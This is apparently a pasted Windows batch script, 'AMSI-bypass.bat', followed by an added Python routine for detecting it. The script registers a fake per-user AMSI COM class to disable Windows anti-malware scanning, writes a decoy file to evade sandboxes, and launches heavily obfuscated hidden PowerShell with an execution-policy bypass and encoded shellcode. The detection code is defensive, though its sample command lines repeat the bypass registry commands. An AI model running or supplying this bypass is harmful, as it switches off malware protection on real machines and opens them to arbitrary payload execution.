r00t-3xp10it

AMSI-bypass.bat

Mar 14th, 2018
@echo off
:: Write file to disk to evade sandbox detection
echo microsoft > %userprofile%\\license.pem
:: AMSI COM Bypass [ enigma0x3 ]
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f
:: Sleep time to refresh regedit
sleep 3
:: local batch variable declarations
sEt !h=e&& sEt U7=n&& sEt k8=d&& sEt db=P
:: Powershell command obfuscated
@c^M%k8%.E"x"%!h% /c =%db%oW%!h%rS^h%!h%lL"."%!h%Xe -%U7%o%db% -W^I%U7% hI%k8%D%!h%%U7% -%!h%p By%db%a^S%AA%s -%!h%%U7% $ENCODED-SHELLCODE-BASE64
exit
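
Added example, not part of the original paste: a Python check a defender could run over process-creation command lines to flag `reg add` commands that register the CLSID used above under a per-user Classes key. The function names, rule names and sample command lines are constructed for illustration.

```python
import re

# CLSID taken from the paste above; the script shadows it under HKCU.
AMSI_CLSID = "{fdb00e52-a214-4aa1-8fba-4357bb0072ec}"

REG_ADD = re.compile(r'\breg(?:\.exe)?"?\s+add\s', re.I)
# Per-user class registration: HKCU\Software\Classes or HKU\<SID>\Software\Classes.
USER_CLSID_KEY = re.compile(
    r'(?:HKCU|HKEY_CURRENT_USER|(?:HKU|HKEY_USERS)\\[^\\\s"]+)'
    r'\\Software\\Classes\\CLSID\\(\{[0-9a-f-]{36}\})(\\InProcServer32)?', re.I)
DATA_ARG = re.compile(r'\s/d\s+(?:"([^"]*)"|(\S+))', re.I)


def classify(cmdline):
    """Return a finding dict for a `reg add` that shadows the AMSI CLSID, else None."""
    line = cmdline.replace("^", "")  # strip cmd.exe escape carets before matching
    key = USER_CLSID_KEY.search(line) if REG_ADD.search(line) else None
    if not key or key.group(1).lower() != AMSI_CLSID:
        return None
    data = DATA_ARG.search(line)
    rule = "amsi-inprocserver32-override" if key.group(2) else "amsi-clsid-shadow-key"
    return {"rule": rule, "server_path": (data.group(1) or data.group(2)) if data else None}


# Constructed process-creation command lines: the first two mirror the paste,
# the third is a quoted/mixed-case variant, the last two are benign controls.
SAMPLE_CMDLINES = [
    r"REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f",
    r"REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f",
    r'r^eg.exe add "HKEY_CURRENT_USER\Software\Classes\CLSID\{FDB00E52-A214-4AA1-8FBA-4357BB0072EC}\InprocServer32" /ve /d "C:\Users\Public\no such.dll" /f',
    r"reg add HKCU\Software\Classes\CLSID\{11111111-2222-3333-4444-555555555555}\InProcServer32 /ve /d C:\app\plugin.dll /f",
    r"reg query HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}",
]


def scan(cmdlines):
    """Return (index, finding) for every command line that matches."""
    hits = []
    for i, c in enumerate(cmdlines):
        finding = classify(c)
        if finding:
            hits.append((i, finding))
    return hits

if __name__ == "__main__":
    for idx, finding in scan(SAMPLE_CMDLINES):
        print(idx, finding)
```

The check only sees changes made through `reg add`; registry-write telemetry on the same key path covers writes made by other means.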